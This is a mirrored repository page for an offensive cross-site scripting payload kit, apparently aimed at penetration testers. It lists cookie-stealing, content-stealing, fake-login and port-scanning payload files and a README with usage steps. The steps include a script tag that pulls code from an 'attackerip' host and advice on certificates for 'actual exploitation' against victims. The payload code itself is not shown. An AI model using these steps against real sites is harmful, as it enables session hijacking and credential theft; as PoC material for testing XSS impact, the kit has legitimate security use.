Mirrors/xss_payloads
2
0
Fork 0
mirror of https://github.com/nettitude/xss_payloads.git synced 2024-09-20 06:21:58 +00:00
Code Issues Projects Releases Packages Wiki Activity
Mirror of https://github.com/nettitude/xss_payloads
4 commits 1 branch 0 tags 81 KiB
PHP 98.7%
JavaScript 1.3%
Find a file
Strawp caa435d214 Added readme info
2016-05-19 11:48:29 +01:00
apache_httponly_bypass.js first commit 2016-05-18 14:14:39 +01:00
contentstealer.php Added the PHP xss payloads 2016-05-18 14:21:52 +01:00
cookiestealer.php Added the PHP xss payloads 2016-05-18 14:21:52 +01:00
formsubmitter.php Added the PHP xss payloads 2016-05-18 14:21:52 +01:00
local_network_scan.js Working local network portscanner 2016-05-18 17:41:46 +01:00
loginpage.php Added the PHP xss payloads 2016-05-18 14:21:52 +01:00
README.md Added readme info 2016-05-19 11:48:29 +01:00

README.md

xss_payloads

Payloads for practical exploitation of cross site scripting.

Usage

  1. Find XSS vuln in your app
  2. Get PoC exploit: alert(1) etc
  3. Host these payloads somewhere
  4. Use vuln to pull one of these payloads into the app <script src="http://attackerip/file.js"></script>
  5. Profit

js vs php files

Some of the files are plain JavaScript .js files, others are PHP scripts which serve JavaScript when rendered in order to do some more complex stuff. Make sure you have a PHP interpreter running on your web server of choice to get these to work </obvious>

Common Problems

  • You can't serve these over HTTP if your app is running on HTTPS. You'll need to serve them over HTTPS
  • If you're running these over HTTPS for actual exploitation rather than a PoC, you'll need a proper trusted TLS cert (Let's Encrypt CA, for example) otherwise victim's browsers won't fetch the files at all. If it's for a PoC you can just temporarily trust your self signed cert.
  • Hit F12 and view the debug console for any information about why a particular script might not work